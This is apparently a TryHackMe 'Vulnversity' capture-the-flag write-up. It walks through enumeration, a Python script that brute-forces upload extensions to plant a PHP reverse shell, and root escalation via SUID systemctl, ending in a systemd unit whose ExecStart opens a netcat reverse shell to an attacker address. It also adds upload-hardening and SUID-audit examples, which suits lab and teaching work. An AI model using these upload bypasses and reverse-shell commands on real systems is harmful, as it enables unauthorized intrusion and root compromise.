Vulnversity (THM)

TryHackMe - Vulnversity Write-Up

Topics: web application attacks (file upload), outdated/insecure configurations, Linux privilege escalation (SUID)

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

Enumeration

Initial nmap scan: ./autonmap.sh $ip Basic (autonmap.sh is a wrapper around nmap; a plain nmap -sC -sV $ip gives the same port and service information).

We have six ports open. Navigating to port 3333 in a browser reveals a website entitled "Vulnversity." Let's enumerate the website's directories.

python3 dirsearch.py -u http://10.10.186.73:3333 -e php,html,txt

dirsearch reveals six hidden directories. Most are standard, but one, internal, is interesting: navigating to it reveals a file upload form.

The upload page itself ends in .php, so the server executes PHP. If we can get a PHP file past the upload filter and then request it, it will run on the server.

Local Privilege Escalation

We can write a script to test which PHP extensions the upload form allows.

#!/usr/bin/env python3

import requests

ip = "10.10.186.73"
url = f"http://{ip}:3333/internal/index.php"
shell = "/root/shell.php"   # PHP reverse shell with our listener IP/port filled in

# Candidate extensions; the server only sees the filename sent in the
# multipart body, so the file on disk does not need to be renamed.
extensions = [
    ".php",
    ".php3",
    ".php4",
    ".php5",
    ".phtml",
]

with open(shell, "rb") as f:
    payload = f.read()

for ext in extensions:
    # Same content every time, only the extension in the filename changes
    files = {"file": ("shell" + ext, payload, "application/octet-stream")}
    r = requests.post(url, files=files)

    # The form returns this message when an extension is blocked
    if "Extension not allowed" in r.text:
        print(f"{ext} not allowed")
    else:
        print(f"{ext} is allowed")

From the script, we can see that the site accepts .phtml files. We can use the PHP reverse shell that ships with Kali (/usr/share/webshells/php/php-reverse-shell.php), set $ip and $port to our listener, and save it with a .phtml extension.

Start a listener with nc -lvnp <port>, upload the .phtml file through the form, then request the uploaded file in the browser to execute it and catch the shell.

Brute forcing with Burp Suite:

alt tool:
https://github.com/asciimoo/wuzz

Burp listens on 127.0.0.1:8080, so the browser's proxy settings must point at it. Once the browser trusts Burp's CA certificate, Burp can also intercept HTTPS traffic (not needed here, the target is plain HTTP on port 3333).
Intercept an upload of any .php file and send the request to Intruder.
Clear the default positions and mark only the extension in the filename="..." part of the Content-Disposition header as the payload position (between the § markers), so the rest of the request keeps its original shape.
Load the candidate extensions (.php, .php3, .php4, .php5, .phtml) as the payload list. Intruder URL-encodes payload characters by default, so disable payload encoding or the dot is sent as %2e.
In the results, the permitted extension stands out by response length: its response omits the "Extension not allowed" error message and is therefore shorter than the others (.phtml).
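The reason .phtml gets through is that the form uses a blocklist of extensions, and the PHP handler on the server also executes .phtml. The following is an added example, not code from the write-up or from the target: a reconstruction of a blocklist check of the kind the form appears to use (the exact list is an assumption; the page only shows .php refused and .phtml accepted) beside an allowlist check a hardened upload handler would use, run over constructed sample filenames including the bypass used above.

```python
import os
import re

# Reconstruction of the behaviour the page observed: the upload form rejects
# the usual PHP extensions but not .phtml. The exact list is an assumption.
BLOCKED = {".php", ".php3", ".php4", ".php5"}

# What a hardened handler accepts instead (example allowlist chosen for this demo).
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def vulnerable_check(filename):
    """Blocklist: reject known-bad extensions, let everything else through."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED


def hardened_check(filename):
    """Allowlist: strip any client-supplied path, require exactly one sane
    extension, accept only known-safe types. Anything not positively
    recognised is rejected."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop path component
    if "\x00" in name or name.startswith("."):              # null bytes, dotfiles
        return False
    stem, sep, ext = name.lower().rpartition(".")
    if not sep or "." in stem:                              # no ext, or shell.php.jpg
        return False
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):         # conservative stem
        return False
    return "." + ext in ALLOWED


def compare(candidates):
    """Return {name: (blocklist_verdict, allowlist_verdict)} for a list of names."""
    return {c: (vulnerable_check(c), hardened_check(c)) for c in candidates}


# Constructed sample filenames, including the bypass the write-up relies on.
SAMPLES = [
    "shell.php",        # both checks reject
    "shell.phtml",      # blocklist lets it through: the Vulnversity foothold
    "shell.PHTML",      # case variation
    "shell.php.jpg",    # double extension
    "../../shell.jpg",  # path smuggled in the filename
    "photo.jpg",        # legitimate upload
]

if __name__ == "__main__":
    for name, (vuln, hard) in compare(SAMPLES).items():
        v = "allow" if vuln else "deny"
        h = "allow" if hard else "deny"
        print(f"{name:20} blocklist={v:5} allowlist={h}")
```

On Ubuntu, Apache's default php module configuration maps .php, .phar and .phtml to the PHP handler, which is why the .phtml upload executes. An extension check is only one layer: a handler should also store uploads under a server-generated name in a directory where script execution is disabled.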

Root Privilege Escalation

Let's stabilize the shell with python -c 'import pty; pty.spawn("/bin/bash")' and check for sudo permissions. sudo -l came up empty (www-data has no sudo rights), so instead I listed all SUID files:

find / -perm /4000 -type f -exec ls -lda {} \; 2>/dev/null

/bin/systemctl, the binary that controls systemd and therefore every service on the OS, has the SUID bit set, so it runs as root no matter who invokes it. Since systemctl can install and start unit files, and systemd executes a unit's ExecStart as root, this lets any local user register a service and run arbitrary commands as root.
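The find command above lists every SUID file, and the next step is to pick out the ones that matter. The following is an added example, not part of the write-up: a Python equivalent of the find command that then buckets each SUID binary by name into GTFOBins-abusable (a subset of names from the GTFOBins SUID index), a baseline of SUID binaries normally present on Ubuntu (an assumed list, adjust per distro), or unexpected. The demo() function builds a constructed sample tree in a temporary directory rather than scanning a real system.

```python
import os
import stat
import tempfile

# Names with a SUID entry on GTFOBins (subset; check the site for the full list).
GTFOBINS_SUID = {
    "bash", "sh", "dash", "find", "vim", "vi", "nano", "less", "more", "awk",
    "python", "perl", "env", "cp", "mv", "systemctl", "busybox", "docker",
}
# SUID-root binaries normally present on Ubuntu (assumed baseline; anything
# SUID outside this set deserves a look even without a GTFOBins entry).
BASELINE = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
    "umount", "ping", "pkexec", "fusermount", "ssh-keysign",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/"):
    """Return sorted paths of regular files under `root` with the SUID bit set.
    Same result as: find / -perm -4000 -type f 2>/dev/null"""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _: None):
        # do not descend into pseudo-filesystems
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def classify(paths):
    """Bucket SUID paths by basename: GTFOBins-abusable, baseline, or unexpected."""
    out = {"abusable": [], "baseline": [], "unexpected": []}
    for p in paths:
        base = os.path.basename(p).rstrip("0123456789.")   # python3.8 -> python
        if base in GTFOBINS_SUID:
            out["abusable"].append(p)
        elif base in BASELINE:
            out["baseline"].append(p)
        else:
            out["unexpected"].append(p)
    return out


def demo():
    """Constructed sample tree (not a real system): creates a few files in a
    temp dir, sets SUID on some of them (no root needed on your own files),
    and returns the classification by basename."""
    with tempfile.TemporaryDirectory() as tmp:
        os.mkdir(os.path.join(tmp, "bin"))
        for name, mode in [("systemctl", 0o4755), ("passwd", 0o4755),
                           ("ls", 0o755), ("backup-helper", 0o4755)]:
            path = os.path.join(tmp, "bin", name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        result = classify(find_suid(tmp))
        return {k: [os.path.basename(p) for p in v] for k, v in result.items()}


if __name__ == "__main__":
    for bucket, paths in classify(find_suid("/")).items():
        print(bucket)
        for p in paths:
            print("  " + p)
```

Run it as-is on the target to get the three buckets; on Vulnversity /bin/systemctl lands in the abusable bucket, which is exactly the hit the write-up goes on to exploit.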

Using the systemctl SUID entry from GTFOBins with a few tweaks (our listener address and port; 10.6.18.145 is the attacking machine's VPN address), we create a service whose ExecStart spawns a reverse shell. Start nc -lvnp 443 on the attacking machine first, then run the following on the target:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 443 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
